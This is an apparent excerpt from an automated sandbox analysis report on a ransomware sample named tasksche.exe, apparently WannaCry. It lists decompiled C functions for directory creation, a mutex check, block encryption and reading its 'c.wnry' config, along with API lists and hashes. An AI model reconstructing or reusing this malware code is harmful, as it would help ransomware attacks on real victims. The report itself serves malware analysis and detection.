                                                                                0x004012d1
                                                                                0x004012d2
                                                                                0x004012c0
                                                                                0x004012d6
                                                                                0x004012d9
                                                                                0x004012dd
                                                                                0x004012e1
                                                                                0x004012e2
                                                                                0x004012eb
                                                                                0x004012ee
                                                                                0x004012ee
                                                                                0x004012f1
                                                                                0x004012f4
                                                                                0x004012fc

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: rand$wcslen$ComputerNamesrand
                                                                                • String ID:
                                                                                • API String ID: 3058258771-0
                                                                                • Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                                                • Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
                                                                                • Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
                                                                                • Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74stringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00407070(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t16 = _t31[1];
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E00407070(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}












                                                                                0x0040707a
                                                                                0x00407080
                                                                                0x00407091
                                                                                0x00407091
                                                                                0x00407097
                                                                                0x0040709a
                                                                                0x0040709e
                                                                                0x004070a5
                                                                                0x004070a7
                                                                                0x004070a9
                                                                                0x004070ab
                                                                                0x004070b1
                                                                                0x004070b1
                                                                                0x004070b3
                                                                                0x004070b6
                                                                                0x004070b7
                                                                                0x004070bd
                                                                                0x004070bf
                                                                                0x004070ca
                                                                                0x004070cf
                                                                                0x004070df
                                                                                0x004070e4
                                                                                0x004070e7
                                                                                0x004070f1
                                                                                0x004070fb
                                                                                0x00407101
                                                                                0x0040710a
                                                                                0x00407118
                                                                                0x00407121
                                                                                0x00000000
                                                                                0x0040712c
                                                                                0x00407121
                                                                                0x00407135

                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
                                                                                • memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
                                                                                • strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
                                                                                • strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
                                                                                • String ID:
                                                                                • API String ID: 2935503933-0
                                                                                • Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                                                • Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
                                                                                • Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
                                                                                • Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00401EFF(intOrPtr _a4) {
				char _v104;
				void* _t9;
				void* _t11;
				void* _t12;

				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
				_t12 = 0;
				if(_a4 <= 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t9 = OpenMutexA(0x100000, 1,  &_v104);
					if(_t9 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t12 = _t12 + 1;
					if(_t12 < _a4) {
						continue;
					}
					goto L3;
				}
				CloseHandle(_t9);
				_t11 = 1;
				return _t11;
			}







                                                                                0x00401f16
                                                                                0x00401f1c
                                                                                0x00401f24
                                                                                0x00401f4c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401f26
                                                                                0x00401f26
                                                                                0x00401f31
                                                                                0x00401f39
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401f40
                                                                                0x00401f46
                                                                                0x00401f4a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00401f4a
                                                                                0x00401f52
                                                                                0x00401f5a
                                                                                0x00000000

                                                                                APIs
                                                                                • sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
                                                                                • OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
                                                                                • Sleep.KERNEL32(000003E8), ref: 00401F40
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00401F52
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleMutexOpenSleepsprintf
                                                                                • String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
                                                                                • API String ID: 2780352083-2959021817
                                                                                • Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                                                • Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
                                                                                • Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
                                                                                • Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				void* _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _t121;
				int _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				int _t131;
				intOrPtr* _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				signed int _t150;
				intOrPtr _t160;
				int _t161;
				int _t163;
				signed int _t164;
				signed int _t165;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				intOrPtr _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t198;
				void* _t201;

				_t197 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
				}
				_t121 = _a12;
				if(_t121 == 0) {
					L15:
					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
					_push( &_v16);
					_push(0);
					_push(_t197);
					_t198 = _v36;
					_t194 = _v32;
					_t168 =  *((intOrPtr*)(_t198 + 0x30));
					_t160 =  *((intOrPtr*)(_t198 + 0x34));
					_t71 = _t194 + 0xc; // 0x40d568
					_v48 =  *_t71;
					_v32 = _t168;
					if(_t168 > _t160) {
						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
					}
					_t75 = _t194 + 0x10; // 0x19930520
					_t124 =  *_t75;
					_t161 = _t160 - _t168;
					if(_t161 > _t124) {
						_t161 = _t124;
					}
					if(_t161 != 0 && _a8 == 0xfffffffb) {
						_a8 = _a8 & 0x00000000;
					}
					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
					 *(_t194 + 0x10) = _t124 - _t161;
					_t126 =  *((intOrPtr*)(_t198 + 0x38));
					if(_t126 != 0) {
						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
						_t201 = _t201 + 0xc;
						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
					}
					if(_t161 != 0) {
						memcpy(_v12, _a4, _t161);
						_v12 = _v12 + _t161;
						_t201 = _t201 + 0xc;
						_a4 = _a4 + _t161;
					}
					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
					if(_a4 == _t127) {
						_t169 =  *((intOrPtr*)(_t198 + 0x28));
						_a4 = _t169;
						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
						}
						_t99 = _t194 + 0x10; // 0x19930520
						_t131 =  *_t99;
						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
						if(_t163 > _t131) {
							_t163 = _t131;
						}
						if(_t163 != 0 && _a8 == 0xfffffffb) {
							_a8 = _a8 & 0x00000000;
						}
						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
						 *(_t194 + 0x10) = _t131 - _t163;
						_t133 =  *((intOrPtr*)(_t198 + 0x38));
						if(_t133 != 0) {
							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
							_t201 = _t201 + 0xc;
							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
						}
						if(_t163 != 0) {
							memcpy(_v12, _a4, _t163);
							_v12 = _v12 + _t163;
							_a4 = _a4 + _t163;
						}
					}
					 *(_t194 + 0xc) = _v12;
					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
					return _a8;
				} else {
					_t170 =  *(_t197 + 0x3cc);
					if(_t121 % _t170 != 0) {
						goto L15;
					} else {
						if(_a16 != 1) {
							_t195 = _a4;
							_t139 = _a12;
							_a16 = 0;
							_t164 = _a8;
							if(_a16 != 2) {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E00403797(_t197, _t195, _t164);
										_t172 =  *(_t197 + 0x3cc);
										_t195 = _t195 + _t172;
										_t143 = _a12 / _t172;
										_t164 = _t164 + _t172;
										_a16 = _a16 + 1;
									} while (_a16 < _t143);
									return _t143;
								}
							} else {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E0040350F(_t197, _t197 + 0x3f0, _t164);
										E00403A28(_t197, _t164, _t195);
										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
										_t175 =  *(_t197 + 0x3cc);
										_t201 = _t201 + 0xc;
										_t150 = _a12 / _t175;
										_t195 = _t195 + _t175;
										_t164 = _t164 + _t175;
										_a16 = _a16 + 1;
									} while (_a16 < _t150);
									return _t150;
								}
							}
						} else {
							_t196 = _a4;
							_t140 = _a12 / _t170;
							_a16 = 0;
							_t165 = _a8;
							if(_t140 > 0) {
								do {
									E00403797(_t197, _t196, _t165);
									E00403A28(_t197, _t165, _t197 + 0x3f0);
									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
									_t178 =  *(_t197 + 0x3cc);
									_t201 = _t201 + 0xc;
									_t140 = _a12 / _t178;
									_t196 = _t196 + _t178;
									_t165 = _t165 + _t178;
									_a16 = _a16 + 1;
								} while (_a16 < _t140);
							}
						}
						return _t140;
					}
				}
			}





































                                                                                0x00403a7f
                                                                                0x00403a87
                                                                                0x00403a91
                                                                                0x00403a9a
                                                                                0x00403a9f
                                                                                0x00403aa0
                                                                                0x00403aa0
                                                                                0x00403aa5
                                                                                0x00403aaa
                                                                                0x00403bba
                                                                                0x00403bc2
                                                                                0x00403bcb
                                                                                0x00403bd0
                                                                                0x00403bd1
                                                                                0x00403bd9
                                                                                0x00403bda
                                                                                0x00403bdb
                                                                                0x00403bdc
                                                                                0x00403be0
                                                                                0x00403be3
                                                                                0x00403be6
                                                                                0x00403be9
                                                                                0x00403bee
                                                                                0x00403bf1
                                                                                0x00403bf4
                                                                                0x00403bf6
                                                                                0x00403bf6
                                                                                0x00403bf9
                                                                                0x00403bf9
                                                                                0x00403bfc
                                                                                0x00403c00
                                                                                0x00403c02
                                                                                0x00403c02
                                                                                0x00403c06
                                                                                0x00403c0e
                                                                                0x00403c0e
                                                                                0x00403c12
                                                                                0x00403c17
                                                                                0x00403c1a
                                                                                0x00403c1f
                                                                                0x00403c26
                                                                                0x00403c28
                                                                                0x00403c2b
                                                                                0x00403c2e
                                                                                0x00403c2e
                                                                                0x00403c33
                                                                                0x00403c3c
                                                                                0x00403c41
                                                                                0x00403c44
                                                                                0x00403c47
                                                                                0x00403c47
                                                                                0x00403c4a
                                                                                0x00403c50
                                                                                0x00403c52
                                                                                0x00403c58
                                                                                0x00403c5b
                                                                                0x00403c5d
                                                                                0x00403c5d
                                                                                0x00403c63
                                                                                0x00403c63
                                                                                0x00403c66
                                                                                0x00403c6a
                                                                                0x00403c6c
                                                                                0x00403c6c
                                                                                0x00403c70
                                                                                0x00403c78
                                                                                0x00403c78
                                                                                0x00403c7c
                                                                                0x00403c81
                                                                                0x00403c84
                                                                                0x00403c89
                                                                                0x00403c90
                                                                                0x00403c92
                                                                                0x00403c95
                                                                                0x00403c98
                                                                                0x00403c98
                                                                                0x00403c9d
                                                                                0x00403ca6
                                                                                0x00403cab
                                                                                0x00403cb1
                                                                                0x00403cb1
                                                                                0x00403c9d
                                                                                0x00403cb7
                                                                                0x00403cbd
                                                                                0x00403cc7
                                                                                0x00403ab0
                                                                                0x00403ab0
                                                                                0x00403abc
                                                                                0x00000000
                                                                                0x00403ac2
                                                                                0x00403ac6
                                                                                0x00403b2c
                                                                                0x00403b2f
                                                                                0x00403b32
                                                                                0x00403b35
                                                                                0x00403b38
                                                                                0x00403b8d
                                                                                0x00403b91
                                                                                0x00403b93
                                                                                0x00403b97
                                                                                0x00403b9c
                                                                                0x00403ba7
                                                                                0x00403ba9
                                                                                0x00403bab
                                                                                0x00403bad
                                                                                0x00403bb0
                                                                                0x00000000
                                                                                0x00403b93
                                                                                0x00403b3a
                                                                                0x00403b3c
                                                                                0x00403b40
                                                                                0x00403b42
                                                                                0x00403b4c
                                                                                0x00403b55
                                                                                0x00403b68
                                                                                0x00403b6d
                                                                                0x00403b78
                                                                                0x00403b7b
                                                                                0x00403b7d
                                                                                0x00403b7f
                                                                                0x00403b81
                                                                                0x00403b84
                                                                                0x00000000
                                                                                0x00403b42
                                                                                0x00403b40
                                                                                0x00403ac8
                                                                                0x00403acb
                                                                                0x00403ace
                                                                                0x00403ad0
                                                                                0x00403ad3
                                                                                0x00403ad8
                                                                                0x00403ada
                                                                                0x00403ade
                                                                                0x00403aed
                                                                                0x00403b00
                                                                                0x00403b05
                                                                                0x00403b10
                                                                                0x00403b13
                                                                                0x00403b15
                                                                                0x00403b17
                                                                                0x00403b19
                                                                                0x00403b1c
                                                                                0x00403ada
                                                                                0x00403ad8
                                                                                0x00403b25
                                                                                0x00403b25
                                                                                0x00403abc

                                                                                APIs
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
                                                                                • ??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
                                                                                • _CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??0exception@@ExceptionThrowmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2382887404-0
                                                                                • Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                                                • Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
                                                                                • Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
                                                                                • Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
                                                                                • fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
                                                                                • fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
                                                                                • fclose.MSVCRT(00000000), ref: 00401058
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: fclosefopenfreadfwrite
                                                                                • String ID: c.wnry
                                                                                • API String ID: 4000964834-3240288721
                                                                                • Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                                                • Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
                                                                                • Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
                                                                                • Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79filememoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 24%
                                                                                			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				signed int _v44;
				void* _t18;
				void* _t28;
				long _t34;
				intOrPtr _t38;

				_push(0xffffffff);
				_push(0x4081f0);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t38;
				_v44 = _v44 | 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t18;
				if(_t18 != 0xffffffff) {
					_t34 = GetFileSize(_t18, 0);
					_v40 = _t34;
					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
						_t28 = GlobalAlloc(0, _t34);
						_v36 = _t28;
						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
							_push(_a8);
							_push(0);
							_push(0);
							_push(_v32);
							_push(_t28);
							_push(_a4);
							if( *0x40f898() != 0) {
								_push(1);
								_pop(0);
							}
						}
					}
				}
				_push(0xffffffff);
				_push( &_v20);
				L004076FA();
				 *[fs:0x0] = _v20;
				return 0;
			}













                                                                                0x004018fc
                                                                                0x004018fe
                                                                                0x00401903
                                                                                0x0040190e
                                                                                0x0040190f
                                                                                0x0040191c
                                                                                0x00401922
                                                                                0x00401925
                                                                                0x00401928
                                                                                0x0040193a
                                                                                0x00401940
                                                                                0x00401946
                                                                                0x00401950
                                                                                0x00401952
                                                                                0x00401958
                                                                                0x0040196a
                                                                                0x0040196c
                                                                                0x00401971
                                                                                0x00401987
                                                                                0x0040198a
                                                                                0x0040198b
                                                                                0x0040198c
                                                                                0x0040198f
                                                                                0x00401990
                                                                                0x0040199b
                                                                                0x0040199d
                                                                                0x0040199f
                                                                                0x0040199f
                                                                                0x0040199b
                                                                                0x00401971
                                                                                0x00401958
                                                                                0x004019a0
                                                                                0x004019a5
                                                                                0x004019a6
                                                                                0x004019d5
                                                                                0x004019e0

                                                                                APIs
                                                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040193A
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 0040194A
                                                                                • GlobalAlloc.KERNEL32(00000000,00000000,?,?,?,?,?,?,00401448,?), ref: 00401964
                                                                                • ReadFile.KERNEL32(000000FF,00000000,00000000,?,00000000,?,?,?,?,?,?,00401448,?), ref: 0040197D
                                                                                • _local_unwind2.MSVCRT(?,000000FF,?,?,?,?,?,?,00401448,?), ref: 004019A6
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AllocCreateGlobalReadSize_local_unwind2
                                                                                • String ID:
                                                                                • API String ID: 2811923685-0
                                                                                • Opcode ID: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                                                • Instruction ID: fb063a64e2dc49fc25d010f75d45645ced701e765f932c996de96a45c5b9f027
                                                                                • Opcode Fuzzy Hash: 232dc3714e51fefb2f6fb0f5b065eea7eb2b0009f41f45388587d49ab84ddf28
                                                                                • Instruction Fuzzy Hash: B62160B1901624AFCB209B99CD48FDF7E78EB097B0F54022AF525B22E0D7785805C6AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405BAE Relevance: 6.1, APIs: 4, Instructions: 93fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E00405BAE(CHAR* _a4, intOrPtr _a8, long _a12, void* _a16) {
				char _v5;
				char _v6;
				long _t30;
				char _t32;
				long _t34;
				void* _t46;
				intOrPtr* _t49;
				long _t50;

				_t30 = _a12;
				if(_t30 == 1 || _t30 == 2 || _t30 == 3) {
					_t49 = _a16;
					_t46 = 0;
					_v6 = 0;
					 *_t49 = 0;
					_v5 = 0;
					if(_t30 == 1) {
						_t46 = _a4;
						_v5 = 0;
						L11:
						_t30 = SetFilePointer(_t46, 0, 0, 1);
						_v6 = _t30 != 0xffffffff;
						L12:
						_push(0x20);
						L00407700();
						_t50 = _t30;
						if(_a12 == 1 || _a12 == 2) {
							 *_t50 = 1;
							 *((char*)(_t50 + 0x10)) = _v5;
							_t32 = _v6;
							 *((char*)(_t50 + 1)) = _t32;
							 *(_t50 + 4) = _t46;
							 *((char*)(_t50 + 8)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
							if(_t32 != 0) {
								 *((intOrPtr*)(_t50 + 0xc)) = SetFilePointer(_t46, 0, 0, 1);
							}
						} else {
							 *_t50 = 0;
							 *((intOrPtr*)(_t50 + 0x14)) = _a4;
							 *((char*)(_t50 + 1)) = 1;
							 *((char*)(_t50 + 0x10)) = 0;
							 *((intOrPtr*)(_t50 + 0x18)) = _a8;
							 *((intOrPtr*)(_t50 + 0x1c)) = 0;
							 *((intOrPtr*)(_t50 + 0xc)) = 0;
						}
						 *_a16 = 0;
						_t34 = _t50;
						goto L18;
					}
					if(_t30 != 2) {
						goto L12;
					}
					_t46 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
					if(_t46 != 0xffffffff) {
						_v5 = 1;
						goto L11;
					}
					 *_t49 = 0x200;
					goto L8;
				} else {
					 *_a16 = 0x10000;
					L8:
					_t34 = 0;
					L18:
					return _t34;
				}
			}











                                                                                0x00405bb2
                                                                                0x00405bbb
                                                                                0x00405bd2
                                                                                0x00405bd7
                                                                                0x00405bdc
                                                                                0x00405bdf
                                                                                0x00405be1
                                                                                0x00405be4
                                                                                0x00405c18
                                                                                0x00405c1b
                                                                                0x00405c24
                                                                                0x00405c29
                                                                                0x00405c32
                                                                                0x00405c36
                                                                                0x00405c36
                                                                                0x00405c38
                                                                                0x00405c42
                                                                                0x00405c44
                                                                                0x00405c6c
                                                                                0x00405c6f
                                                                                0x00405c72
                                                                                0x00405c77
                                                                                0x00405c7a
                                                                                0x00405c7d
                                                                                0x00405c80
                                                                                0x00405c83
                                                                                0x00405c90
                                                                                0x00405c90
                                                                                0x00405c4c
                                                                                0x00405c4f
                                                                                0x00405c51
                                                                                0x00405c57
                                                                                0x00405c5b
                                                                                0x00405c5e
                                                                                0x00405c61
                                                                                0x00405c64
                                                                                0x00405c64
                                                                                0x00405c96
                                                                                0x00405c98
                                                                                0x00000000
                                                                                0x00405c98
                                                                                0x00405be9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405c04
                                                                                0x00405c09
                                                                                0x00405c20
                                                                                0x00000000
                                                                                0x00405c20
                                                                                0x00405c0b
                                                                                0x00000000
                                                                                0x00405bc7
                                                                                0x00405bca
                                                                                0x00405c11
